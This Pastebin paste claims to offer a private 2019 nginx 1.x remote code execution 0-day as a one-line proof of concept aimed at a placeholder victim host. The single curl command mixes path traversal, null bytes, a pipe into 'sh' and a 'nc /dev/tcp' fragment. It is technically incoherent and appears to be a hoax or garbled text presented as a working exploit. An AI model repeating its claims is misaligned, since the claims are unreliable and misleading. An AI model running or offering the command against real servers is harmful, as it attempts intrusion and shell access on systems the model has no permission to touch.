Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- nginx 1.x Remote Code Execution vulnerability [PoC] exploit
- Change: victim.server.here to target IP / host of nginx 1.x server
- Credits: alhambro [br0ken crew]
- --- [ 2019 DO NOT DISTRIBUTE PRIVATE 0DAY ] --
- nginx 1.x PoC on-liner. Null-byte RCE overflow in nginx BLT/Stream
- curl -gsS https://victim.server.here:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00victim.server.here/../../../%00/n …\<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement